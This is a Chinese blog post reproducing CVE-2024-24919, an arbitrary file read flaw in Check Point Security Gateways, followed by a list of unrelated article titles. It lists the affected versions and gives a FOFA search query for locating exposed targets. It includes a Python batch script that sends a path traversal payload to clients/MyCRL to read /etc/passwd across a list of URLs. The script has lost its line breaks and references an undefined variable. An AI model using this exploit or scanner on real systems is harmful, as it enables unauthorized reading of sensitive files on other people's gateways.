当前位置: 首页 > news >正文

Check Point 安全网关任意文件读取漏洞复现(CVE-2024-24919)

Check Point 安全网关任意文件读取漏洞复现(CVE-2024-24919)

1.漏洞描述

Check Point Security Gateways 是 Check Point Sofware 提供的一系列 网络安全Q解决方案。这些解决方案包括下一代防火墙(NGFW)、数据中心安全网关和 A1驱动的量子网关,旨在为企业提供针对复杂网络威胁的先进防护。它们通过集成的威胁防护、统的安全管理和策略控制,确保网络、云、移动和端点的安全。

Check Point Security Gateways 任意文件读取漏洞(CVE-2024-24919)存在在野利用,远程攻击者可以通过构造恶意请求读取服务器上的任意文件,造成敏感信息的泄漏。目前,此漏洞已检测到在野利用。鉴于该漏洞影响范围较大,建议客户尽快做好自查及防护。

2.影响范围

Check Point Security Gateways R77.20 (EOL)

Check Point Security Gateways R77.30 (EOL)

Check Point Security Gateways R80.10 (EOL)

Check Point Security Gateways R80.20 (EOL)

Check Point Security Gateways R80.20.x

Check Point Security Gateways R80.20SP (EOL)

Check Point Security Gateways R80.30 (EOL)

Check Point Security Gateways R80.30SP (EOL)

Check Point Security Gateways R80.40 (EOL)

Check Point Security Gateways R81

Check Point Security Gateways R81.10

Check Point Security Gateways R81.10.x

Check Point Security Gateways R81.20

fofa语法

app="Check_Point-SSL-Network-Extender"

3.漏洞复现

在这里插入图片描述

4.python批量验证

import requests
from urllib.parse import urljoin
import urllib3
from requests.exceptions import SSLErrorurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)def send_post_request(base_url, file):full_url = urljoin(base_url, 'clients/MyCRL')full_payload = "aCSHELL/../../../../../../.." + fileheaders = {'Content-Length': str(len(full_payload))}try:response = requests.post(full_url, data=full_payload, headers=headers, proxies=proxies, verify=False)if response.status_code == 200 and 'root' in response.content.decode():print(f'存在漏洞,URL为: {base_url}')except SSLError as e:print(f"SSL error accessing {base_url}: {e}")except requests.exceptions.RequestException as e:print(f"Error accessing {base_url}: {e}")def read_urls_from_file(file_path):try:with open(file_path, 'r') as file:urls = file.readlines()# Strip whitespace characters like `\n` at the end of each lineurls = [url.strip() for url in urls]return urlsexcept Exception as e:print(f"Error reading URLs from file: {e}")return []if __name__ == "__main__":input_file = 'urls.txt'target_file = '/etc/passwd'urls = read_urls_from_file(input_file)for url in urls:send_post_request(url, target_file)

在这里插入图片描述

5.漏洞修复

目前官方已发布安全补丁,建议用户访问 Check Point 官方支持页面:

https://support.checkpoint.com/results/sk/sk182336

相关文章:

  • spring自动配置
  • 智能台灯系统之PWM调光的优缺点
  • 销量逆袭!敦煌店铺如何靠自养号测评轻松引爆市场?
  • ROS for LabVIEW:实现LabVIEW与ROS的无缝集成
  • 探索 Ollama: 你的本地 AI 助手
  • Unreal Engine游戏引擎小白入门指南
  • 构建坚不可摧的Web安全防线:深入剖析二阶注入与全面防御策略
  • 基础—SQL—DML(数据操作语言)插入数据
  • ffmpeg在特定时间点插入素材
  • SpringBoot整合Kafka的快速使用教程
  • 爬虫学习--17.反爬斗争 selenium(2)
  • 机器人控制系列教程之D-H参数建模法
  • golang语言的gofly快速开发框架如何设置多样的主题说明
  • Java——变量
  • Linux汉化Jupyter Notebook
  • [译] React v16.8: 含有Hooks的版本
  • 【159天】尚学堂高琪Java300集视频精华笔记(128)
  • Centos6.8 使用rpm安装mysql5.7
  • Hibernate【inverse和cascade属性】知识要点
  • Invalidate和postInvalidate的区别
  • JavaScript 奇技淫巧
  • Javascript设计模式学习之Observer(观察者)模式
  • Linux CTF 逆向入门
  • Node + FFmpeg 实现Canvas动画导出视频
  • 浮现式设计
  • 高度不固定时垂直居中
  • 入手阿里云新服务器的部署NODE
  • 数据可视化之 Sankey 桑基图的实现
  • 微信端页面使用-webkit-box和绝对定位时,元素上移的问题
  • 微信公众号开发小记——5.python微信红包
  • 一个项目push到多个远程Git仓库
  • 因为阿里,他们成了“杭漂”
  • 阿里云重庆大学大数据训练营落地分享
  • ​LeetCode解法汇总2808. 使循环数组所有元素相等的最少秒数
  • ​补​充​经​纬​恒​润​一​面​
  • # Python csv、xlsx、json、二进制(MP3) 文件读写基本使用
  • #include<初见C语言之指针(5)>
  • %3cscript放入php,跟bWAPP学WEB安全(PHP代码)--XSS跨站脚本攻击
  • (C语言)编写程序将一个4×4的数组进行顺时针旋转90度后输出。
  • (JSP)EL——优化登录界面,获取对象,获取数据
  • (八)Docker网络跨主机通讯vxlan和vlan
  • (附源码)ssm本科教学合格评估管理系统 毕业设计 180916
  • (每日一问)设计模式:设计模式的原则与分类——如何提升代码质量?
  • (三)elasticsearch 源码之启动流程分析
  • (四)Android布局类型(线性布局LinearLayout)
  • (已解决)Bootstrap精美弹出框模态框modal,实现js向modal传递数据
  • (转)德国人的记事本
  • (转)拼包函数及网络封包的异常处理(含代码)
  • .cn根服务器被攻击之后
  • .net Application的目录
  • .NET CLR基本术语
  • .NET HttpWebRequest、WebClient、HttpClient
  • .net mvc actionresult 返回字符串_.NET架构师知识普及
  • .Net Remoting常用部署结构
  • .net 流——流的类型体系简单介绍